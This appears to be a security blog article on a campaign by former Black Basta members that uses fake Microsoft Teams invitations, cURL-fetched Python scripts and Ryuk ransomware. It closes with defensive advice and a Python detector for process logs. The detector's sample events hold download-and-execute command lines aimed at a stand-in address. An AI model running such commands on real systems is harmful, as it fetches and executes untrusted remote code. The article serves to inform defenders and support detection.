2025 Cyber Attacks: How Ex-Black Basta Members Utilize Microsoft Teams and Python Scripts

published Tuesday.

Attack Methodology

According to the report, the threat actors embedded malicious links or attachments in emails crafted to look like Microsoft Teams meeting invitations.

The emails were styled to look legitimate and led, without any visible break, to phishing pages dressed up as the Microsoft Teams login portal.

Once a victim entered credentials on the fake portal, the attackers used them to log in to the account and, from that foothold, moved further into the network.

With access established, the attackers then abused poorly configured or unpatched systems to run Python scripts on them remotely.

The scripts were retrieved with cURL requests and executed on the host; their job was to fetch and deploy malicious payloads across the victim's network.

Those cURL requests ran on the vulnerable servers compromised in the earlier stage, so each request pulled down a malicious script and executed it from a host the attackers already controlled.

Real-world Example

In one of the cases studied, a healthcare service provider was targeted.

The attackers planted a malicious Python script whose payload was the Ryuk ransomware.

ReliaQuest traced the payload download to a website impersonating a legitimate Canadian healthcare site.

Once running, Ryuk encrypted files, rendering them inaccessible, and left a ransom demand for their decryption.

Preventive Measures

Organizations need to adopt multi-layered security strategies to mitigate such threats.

They should enforce strict access controls and multi-factor authentication for critical accounts, especially those reachable remotely or through virtual meeting platforms like Microsoft Teams. Because this campaign harvests credentials on a fake login portal, phishing-resistant MFA (FIDO2/WebAuthn) is preferable to one-time codes, which a proxying phishing page can relay.

Regular patching and system updates close the vulnerabilities that the remote script execution stage depends on.

Monitoring network traffic and process activity for cURL requests that fetch scripts, and for Python interpreters launched in unusual ways (piped from a downloader, run from a temporary directory, or executing an inline one-liner that fetches code), can give early detection. Alert on the combination rather than on cURL or Python alone, since both are common on servers.
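The command patterns described under Attack Methodology (a cURL request that pulls down a Python script and hands it to the interpreter) and the monitoring suggested here, as an added example that is not part of the original article or the ReliaQuest report: a small Python detector run over constructed, Sysmon/EDR-style process-creation events. The hostnames, user names, file paths, field names and the 203.0.113.10 address (documentation range) are all assumptions made for the example; the rules are written for Linux hosts.

```python
import re
from datetime import datetime, timedelta

# Constructed sample telemetry (not real logs from the report): process-creation
# events with Sysmon/EDR-style fields. 203.0.113.10 is a documentation address.
SAMPLE_EVENTS = [
    {"ts": "2025-02-25T10:00:01Z", "host": "web01", "user": "www-data", "image": "/bin/sh",
     "cmdline": 'sh -c "curl -s http://203.0.113.10/stage.py | python3 -"'},
    {"ts": "2025-02-25T10:02:10Z", "host": "build02", "user": "ci", "image": "/usr/bin/python3",
     "cmdline": "python3 -c \"import urllib.request as u;exec(u.urlopen('http://203.0.113.10/p').read())\""},
    {"ts": "2025-02-25T10:05:00Z", "host": "web01", "user": "www-data", "image": "/usr/bin/curl",
     "cmdline": "curl -s -o /tmp/.u.py http://203.0.113.10/u.py"},
    {"ts": "2025-02-25T10:05:03Z", "host": "web01", "user": "www-data", "image": "/usr/bin/python3",
     "cmdline": "python3 /tmp/.u.py"},
    {"ts": "2025-02-25T10:07:00Z", "host": "build02", "user": "ci", "image": "/usr/bin/python3",
     "cmdline": "python3 /opt/app/manage.py migrate"},          # benign
    {"ts": "2025-02-25T10:08:00Z", "host": "web01", "user": "www-data", "image": "/usr/bin/curl",
     "cmdline": "curl -s https://example.com/health"},          # benign
    {"ts": "2025-02-25T10:09:00Z", "host": "app03", "user": "ci", "image": "/usr/bin/python3",
     "cmdline": "python3 /tmp/pytest-of-ci/test.py"},           # benign: nothing downloaded first
]

# Rule 1: a downloader piped straight into a Python interpreter.
PIPED_DOWNLOAD = re.compile(r"\b(curl|wget)\b[^|]*\|\s*python(\d(\.\d+)?)?\b", re.I)
# Rule 2: a "python -c" one-liner that fetches over HTTP and exec()/eval()s the result.
INLINE_FETCH = re.compile(r"\s-c\s.*\b(urlopen|requests\.get|https?://)", re.I)
INLINE_EXEC = re.compile(r"\b(exec|eval)\s*\(")
# Rule 3 (correlated): a downloader writes a file into a staging directory, then Python
# runs that file on the same host within the window. Matches curl -o/--output and
# wget -O; curl's -O (remote name) captures the URL instead, which never starts with
# a staging directory, so it is simply ignored.
DOWNLOAD_TO_FILE = re.compile(r"\b(curl|wget)\b.*?(?:-o|--output|-O)\s+(\S+)")
PYTHON_IMAGE = re.compile(r"(^|/)python(\d(\.\d+)?)?$")   # Linux interpreter paths only
STAGING_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
CORRELATION_WINDOW = timedelta(minutes=10)


def _parse_ts(ts: str) -> datetime:
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")


def detect(events):
    """Return findings as dicts {'rule', 'host', 'ts', 'cmdline'}, in event order."""
    findings = []
    recent_downloads = {}  # host -> [(datetime, path)] for files written to staging dirs

    def flag(rule, ev):
        findings.append({"rule": rule, "host": ev["host"], "ts": ev["ts"], "cmdline": ev["cmdline"]})

    for ev in sorted(events, key=lambda e: e["ts"]):  # ISO-8601 UTC timestamps sort as strings
        ts, host, cmd = _parse_ts(ev["ts"]), ev["host"], ev["cmdline"]

        if PIPED_DOWNLOAD.search(cmd):
            flag("downloader_piped_to_python", ev)

        m = DOWNLOAD_TO_FILE.search(cmd)
        if m and m.group(2).startswith(STAGING_DIRS):
            recent_downloads.setdefault(host, []).append((ts, m.group(2)))

        if PYTHON_IMAGE.search(ev["image"]):
            if INLINE_FETCH.search(cmd) and INLINE_EXEC.search(cmd):
                flag("python_inline_fetch_and_exec", ev)
            for dl_ts, path in recent_downloads.get(host, []):
                if path in cmd and timedelta(0) <= ts - dl_ts <= CORRELATION_WINDOW:
                    flag("python_runs_freshly_downloaded_script", ev)
                    break
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f['ts']} {f['host']:8} {f['rule']:40} {f['cmdline']}")
```

Run against the sample events, the detector flags the piped download on web01, the inline fetch-and-exec one-liner on build02, and the script on web01 that was executed three seconds after cURL wrote it to /tmp; the ordinary manage.py run, the health-check cURL and the pytest script in /tmp with no preceding download produce nothing. The third rule is the one worth tuning in a real environment: the staging directories, the window and the downloader flags will differ per fleet, and matching on the file path rather than on "python ran something from /tmp" is what keeps the false-positive rate down.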

A robust incident response plan limits the damage after a successful breach: contain the exposure, isolate compromised systems, and neutralize the threat.

Conclusions

The combination of sophistication, ease of execution and potential payoff makes such multi-step attacks appealing to threat actors.

We must stay aware, maintain technical hygiene, and be prepared to act fast.

After all, the best defense is a good offense.

AegisLens